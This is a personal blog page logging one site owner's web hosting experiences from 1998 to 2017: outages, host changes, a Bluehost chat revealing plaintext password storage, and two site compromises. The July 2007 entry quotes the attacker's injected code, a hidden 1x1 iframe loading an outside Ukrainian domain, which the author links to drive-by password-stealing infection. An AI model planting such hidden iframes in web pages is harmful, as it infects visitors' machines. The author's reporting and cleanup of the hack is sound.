|
NOTE: If you take one thing away from this blog, take away this: use different
companies for your website hosting and domain name registration. See the highlighted text below.
May 2017: Bluehost Stores Passwords in the Clear(!)
I've experienced my first real disappointment with Bluehost. They store all of the user
account passwords in the clear so that their techs can use them as
verification that you are who you say you are in live chat. See my conversation
during a live chat wiht a bluehost tech support person on 20 May 2017 below.
This is so disappointing. For those who
do not know, ANY reputable company immediately encrypts (hashes) your password after
you type it in and NEVER knows what it actually is. All they should be able to do
is reset it. They should NOT be able to tell you what it is. For a reputable hoster
to be showing passwords to all of their techs, in the clear, is very troubling.
Welcome To Live Chat
5:20:26 PM
Pramod J: Hello Willus.com, thank you for contacting us. My name is Pramod. How are you Today?
5:21:02 PM
Willus.com: Fine. I cannot access my account through SSH terminal or ftp, like I usually can. The ssh server is down maybe?
5:21:54 PM
Pramod J: Could I get the last 4 characters of the cPanel password to verify ownership of the account?
5:22:27 PM
Willus.com: You can see my cpanel password in the clear?
5:26:29 PM
Pramod J: I didn't get you, I need only last 4 digits and password will be saved only till the chat is active
5:27:14 PM
Willus.com: Can you see my entire password? In the clear?
5:31:20 PM
Willus.com: Hello?
5:33:01 PM
Pramod J: yes
5:33:16 PM
Willus.com: Yes what?
5:34:09 PM
Pramod J: I see it in clear
5:34:16 PM
Pramod J: it is not encrypted
5:34:20 PM
Willus.com: I would like to talk to a supervisor
September 2016: Smooth Sailing Since 2014
Willus.com is still hosted by
BlueHost.com, and willus.org is hosted by
DreamHost.com, as they have been since 2014.
These companies have both proven to have reliable uptime and service over the last
2.5 years, and at reasonable prices.
December 2013: Unprofessional Parting
CWIHosting.com, as I half expected, sent me an invoice by e-mail on 12/1/2013, my renewal date,
despite the fact that I had requested account cancellation two weeks before via multiple
methods. All of their phone numbers are disconnected, and despite
multiple subsequent cancellation requests (including by postal mail), they repeatedly
e-mailed me invoice reminders--five in all
over the course of eight days, but they finally stopped, with the last e-mail from them
threatening to suspend my account(!).
There just doesn't
seem to be anybody home there. Fortunately they had no way to extract money
from me because I long ago removed any payment methods from my account.
Subsequent searches on the web
(and multiple e-mails to me from other customers who have seen this blog)
reveal that other people have had similar
problems trying to part ways with CWIHosting.com. I recommend that you stay away
from CWIHosting.com.
November 15, 2013: Goodbye, CWIHosting.com.
I don't know what's happened with CWIHosting.com. I kind of feel bad for them, because
they've apparently got some systemic problem that they can't figure out which
caused my web site to go down three times in a span of a month, each time for well over
24 hours, and one time for almost two weeks (incomprehensible to me--see next entry).
The most recent time (November 12) was the
final straw for me. I can't be their guinea pig while they figure things out.
They also made a habit of taking away my access to gcc and making me ask them to
restore it--they pulled that little stunt at least four times over the last ten years.
They'd eventually restore it each time, but not without considerable aggravation on my part.
So I've finally cancelled my account with them. It's too bad--I liked their service in most other
respects. Their trouble ticket system is far better than Bluehost's, for example, but
this uptime issue (and their response to it) has become unacceptable.
Willus.com is now hosted by
BlueHost.com, and willus.org is hosted by
DreamHost.com.
My experience
with CWIHosting.com (and before that, Prentice Internet) confirms
that one of the smartest things you can do if you run a personal web site is to
separate your domain name registration from your web site hosting (i.e. use different
companies for each).
That way if you get upset with your hosting service, you don't also
have to move your domain name registration if you want to completely part ways with them.
You can completely independently point your name to a new hosting service.
October 18, 2013: Hoster #3: Bluehost.com.
On October 4, 2013, my web site as hosted on cwihosting.com went down and it was not until
October 17, 2013 that they restored full access to me (and they still have not restored my
access to gcc). They apparently had both the main
server and the backup server fail at the same time (how lucky!).
This is what I heard from cwihosting.com at various times:
October 12, 2013
Thank you for your patience.
The restoration is still going on and will be completed soon.
Please standby for updates.
October 10, 2013
We apologize for the recent outage that has affected your service. Please be assured we are working as quickly as possible to restore service. Unfortunately a double equipment failure has delayed the process. However we are about 80% complete in restoring access. We still have data current up into the day the outage occurred.
October 8, 2013
The server is down due to a degraded RAID array. We have got the following message from our DC floor engineers.
We are aware of the situation and are working to resolve the issue. Unfortunately the backup server crashed at same time and we were unable to retrieve the backups. This means we are having to manually copy the files to new drives from the degraded array.
We are unable to make a backup now.
I've learned my lesson and will set up my site to auto-mirror to willus.org, hosted by BlueHost.com. BlueHost (data center located in Utah) has an A+ rating from the BBB (cwihosting is not affiliated with the BBB). I poked around on the web and read some reviews before selecting them, but they're not perfect. Already my BlueHost site has been down twice for more than a few minutes, and their support ticket system is not as good as cwihosting's. Once you've submitted, there's no way to edit your ticket or add more information, and most of their responses have not been helpful. They are typically one sentence responses along the lines of "Did you try this?" (which I tried and didn't work), or "Sorry, we can't do that." But the site is functional, I have the tools I need to make it a fully functioning mirror, and it's quite a bit less expensive than cwihosting.
March 18, 2008: Hacked again.
This time it was a malicious script uploaded by another user. See the response from my ISP:
|
Your shared hosting server had a user that unknowingly uploaded an
exploitable script. It was a postnuke (blogging system) module called
gallery. Though CWI provides industry leading security for shared
hosting and locks the server down as best as possible while still being
flexible to the needs of its users, resources are still shared. For
this reason, one user uploading an exploitable script, is like opening a
back door to the server, giving an unknown person the keys.
This was a
low risk attack as it was caught within 10 minutes and are usually used
to run simple scripts that are more of an annoyance then anything else.
To be sure, we have reinstalled items on the server to make sure nothing
was left altered on the system, and have suspended the account that
started the incident so that we can make other arrangements for them.
We are also working on a script that can detect and remove .bad. files
and out of date script versions uploaded by actual server users.
To fix
your site, you simply need to replace your index file, at this time it
seems like no other files were affected. If you need further
assistance, please let us know. Thank you for your understanding.
Sincerely,
Jason A. Taylor
Chief Technical Officer
CWI Hosting.com
| |
Yes, they caught it in 10 minutes, but CWI hosting never did the
courtesy of sending me an e-mail that this had happened (thanks!),
so I found out five days later when a friend let me know that my home page
had been hacked.
July 2007: Willus.com hacked!
On July 24, 2007, I discovered that
several of my HTML files on willus.com had been altered the night
before. Somebody had gained FTP access to my site and added lines like
this to my HTML files:
<!-- o4 --><iframe
src="http://t.fala.org.ua/" width=1 height=1
style="display:none"><!-- c4 -->
The .ua
country code is Ukraine. After contacting tech support at CWI hosting,
I was informed that the attack was coming from Hong Kong and that
they'd seen this before. The tech suggested that I may have FTP'd to my
site from a compromised PC that captured my password and sent it to the
machine in Hong Kong. I immediately changed my password and now
only FTP to my machine using secure FTP (using psftp.exe from the putty package). I also wrote a program to fix my infected
HTML files. Apparently the extra line in the infected files causes
vulnerable versions of Internet Explorer to infect PCs with the program
that captures the passwords, and this would be how the thing spreads.
That's my guess, anyway. Searching the web didn't yield much. Near as
I can tell, this is related to the Trojan-Downloader.Win32.Small.evh
virus, but I can't tell for sure. If anybody else has seen something
like this, I'd appreciate an e-mail. This one really surprised me. It
is the first time I've clearly had a password taken from right
underneath my nose.
July 2005: CWI-Hosting Review--still doing well
The aftermath of the server crash was somewhat trying. I had to open
several trouble tickets with CWI to get privileges that I had on the
server before it crashed. For example, they set me up in a restricted,
"jail shell" with no access to gcc.
I could understand that they wanted to have
a secure system, but they tried to deny me services that their web page
clearly advertises as being part of my plan.
After eventually corresponding with the
head of CWI's tech department (who was very pleasant), I had my
full privileges restored.
Since then, I've had no issues. On the plus side, CWI has steadily
been increasing my plan's disk storage quota. It is now over 1 GB,
which gives me plenty of room and is hard to beat for the price I'm
paying ($175/yr).
March 2005: CWI-Hosting server crash
Server crash. The server that CWI was using to host willus.com crashed
this month, and the dust is still settling. The server has been
very sluggish ever since coming back up on 3-21. Read here for more details.
February 2005: CWI-Hosting doing well
After over one year with CWI
Hosting, I have no regrets. My web site has been up every time I've
needed it, and they gave me all the features that were promised on
their web site, though I had to make more than one request to get
access to gcc so that I could compile my own CGI codes for my web
page. In general, the CWI support center has been very responsive.
November 2003: A poor review for Prentice-Internet
I no longer use
Prentice Internet for
my web hosting. I am now using
CWI Hosting
(starter plan, $17.50/mo). Prentice had a history of doing things
to my account unannounced (like resetting my password) and then
apologizing after the fact rather than giving me any warning ahead of time.
In the latest
incident, just last month, they deleted an important file of
mine while running e-mail tests on my account without my knowledge
or permission.
Though I believe it was not done maliciously (they were trying to figure
out an e-mail problem I was having), it was still an important file.
What made things much worse, however, was
when I repeatedly e-mailed Prentice asking them to restore the file,
and they would not
respond in any way. They don't seem to be answering any of my e-mails anymore.
Though at times Prentice has shown me excellent service, there
have been too many occasions like I have just described, and this
last case finally inspired me to look for a new hoster.
CWI Hosting has a polished web site and so far (two weeks of service)
they have quickly responded to questions I've had.
The transition
has been painless.
March 2001: Useful links
Here are two useful sites for understanding
how internet numbers and addresses are assigned:
ICANN (Internet Corporation for
Assigned Names and Numbers) and ARIN
(American Registry for Internet Numbers). Also, you can go
to Netcraft.com to get
information about a web site (what platform it is running and how
is hosting it).
July 2000: Cable modem is great.
I've now been using cable modem for about
six months ($47/mo including rental of the modem). I will never go back
to dial-up. Cable modem (and DSL, I suspect) is so much nicer. It
doesn't tie up your phone, there is no waiting for a connection, no busy
signal, and it's fast (typical 100-400Kbytes/s downloads). My website
service is still provided by
Prentice.
They've done an excellent job
and have virtually never had down time that I've been aware of. And
they are still $17/mo for 300 MB of disk space. That's
very hard to beat.
October 1998: The search for a hoster
I run my web site from home. It run it solely to share information and have some fun.
I started by checking to see if the domain name I wanted (willus.com)
had been taken.
You can get information on domain names by going
to internic.net and entering
the domain name.
Registering a domain name with Internic
is $70 for the first two years and $35/year
thereafter. But to register, you'll need a web hosting service.
Update 8/00: The Internet Corporation for Assigned Names and Numbers
(ICANN)
has now set it up so that you may now choose from any of
several "accredited
registrars" who can set up your domain name. This, in effect, has
commercialized this part of the Internet business, which is driving
the registration fee down a bit. I recently re-registered through
my service provider (Prentice)
for $20/year.
Web hosting services provide you with the internet
IP number for your domain name and an account on a computer
where you can store your web pages. Some also provide you with
a dial-up connection, but usually you have to get that separately.
For example, I use
Prentice-Internet for
my web hosting and Cox Cable for
my connection (cable modem).
There are literally hundreds of web hosters to choose from.
I found budgetweb.com
to be a great source of information on web hosting services. They have
a comprehensive list of features for hundreds of web hosters. Selecting
from this list, I first tried
smarthosting.com, but ended up
transfering to
Prentice
because they had more exactly what I wanted, but both are good
services that give you about 300 MB for about $20-$25/month.
If you have any more questions about how I run my site, send an e-mail.
|
|
|